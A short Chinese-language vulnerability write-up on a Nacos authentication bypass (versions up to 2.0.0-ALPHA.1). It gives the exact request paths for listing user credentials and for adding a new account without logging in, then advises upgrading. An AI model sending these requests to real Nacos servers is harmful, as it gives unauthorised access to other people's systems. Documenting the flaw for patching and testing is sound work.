NACOS身份登陆绕过
简介Nacos 致力于帮助用户发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助用户快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos 支持基于 DNS 和基于 RPC 的服务发现。服务提供者使用 原生SDK、OpenAPI、或一个独立的Agent TODO注册 Service 后,服务消费者可以使用DNS TODO 或HTTP&API查找和发现服务。影响范
·
简介
Nacos 致力于帮助用户发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助用户快速实现动态服务发现、服务配置、服务元数据及流量管理。
Nacos 支持基于 DNS 和基于 RPC 的服务发现。服务提供者使用 原生SDK、OpenAPI、或一个独立的Agent TODO注册 Service 后,服务消费者可以使用DNS TODO 或HTTP&API查找和发现服务。
影响范围
Nacos <= 2.0.0-ALPHA.1
漏洞详情
1、后台扫描
http://example/nacos
2、验证漏洞是否存在
http://example/nacos/v1/auth/users/?pageNo=1&pageSize=5
如果列出登陆的用户名和密码,则可以判断存在绕过漏洞
3、漏洞利用
向系统中添加一个新的用户
访问/nacos/v1/auth/users/?username=sectest&password=sectest ,可以看到用户创建成功。
然后使用该账户进行登陆
修复建议
- 升级版本至最新版
权威|前沿|技术|干货|国内首个API全生命周期开发者社区
更多推荐
0
0- 0
已为社区贡献1条内容
所有评论(0)